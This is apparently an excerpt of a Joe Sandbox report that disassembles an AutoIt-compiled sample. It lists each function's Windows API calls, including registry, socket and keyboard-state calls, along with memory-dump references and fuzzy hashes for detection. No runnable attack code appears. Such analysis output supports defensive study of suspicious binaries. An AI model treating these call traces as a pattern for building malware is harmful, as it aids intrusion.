                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                          • String ID:
                                          • API String ID: 2737351978-0
                                          • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                          • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                          • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                          • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                          APIs
                                          • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                          • __calloc_crt.LIBCMT ref: 00415246
                                          • __getptd.LIBCMT ref: 00415253
                                          • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                          • _free.LIBCMT ref: 0041529E
                                          • __dosmaperr.LIBCMT ref: 004152A9
                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                          • String ID:
                                          • API String ID: 3638380555-0
                                          • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                          • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                          • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                          • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 0046C96E
                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Variant$Copy$ClearErrorInitLast
                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                          • API String ID: 3207048006-625585964
                                          • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                          • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                          • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                          • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                          APIs
                                          • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                          • inet_addr.WSOCK32(?), ref: 0046559B
                                          • gethostbyname.WSOCK32(?), ref: 004655A6
                                          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                          • _memmove.LIBCMT ref: 004656CA
                                          • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                          • WSACleanup.WSOCK32 ref: 00465762
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                          • String ID:
                                          • API String ID: 2945290962-0
                                          • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                          • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                          • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                          • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                          APIs
                                          • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                          • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                          • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                          • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                          • String ID:
                                          • API String ID: 1457242333-0
                                          • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                          • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                          • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                          • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                          APIs
                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ConnectRegistry_memmove_wcslen
                                          • String ID:
                                          • API String ID: 15295421-0
                                          • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                          • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                          • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                          • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                          APIs
                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                          • _wcstok.LIBCMT ref: 004675B2
                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                          • _wcscpy.LIBCMT ref: 00467641
                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                          • _wcslen.LIBCMT ref: 00467793
                                          • _wcslen.LIBCMT ref: 004677BD
                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                          • String ID: X
                                          • API String ID: 780548581-3081909835
                                          • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                          • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                          • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                          • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                          APIs
                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                          • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                          • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                          • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                          • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                          • CloseFigure.GDI32(?), ref: 0044751F
                                          • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                          • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                          • String ID:
                                          • API String ID: 4082120231-0
                                          • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                          • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                          • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                          • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                          APIs
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                          • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                          • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                          • String ID:
                                          • API String ID: 2027346449-0
                                          • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                          • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                          • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                          • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                          APIs
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                          • GetMenu.USER32 ref: 0047A703
                                          • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                          • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                          • _wcslen.LIBCMT ref: 0047A79E
                                          • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                          • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                          • String ID:
                                          • API String ID: 3257027151-0
                                          • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                          • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                          • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                          • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                          APIs
                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorLastselect
                                          • String ID:
                                          • API String ID: 215497628-0
                                          • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                          • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                          • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                          • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                          APIs
                                          • GetParent.USER32(?), ref: 0044443B
                                          • GetKeyboardState.USER32(?), ref: 00444450
                                          • SetKeyboardState.USER32(?), ref: 004444A4
                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                          • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                          • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                          • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                          APIs
                                          • GetParent.USER32(?), ref: 00444633
                                          • GetKeyboardState.USER32(?), ref: 00444648
                                          • SetKeyboardState.USER32(?), ref: 0044469C
                                          • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                          • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                          • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                          • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                          • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                          • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                          • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __snwprintf__wcsicoll_wcscpy
                                          • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                          • API String ID: 1729044348-3025626884
                                          • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                          • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
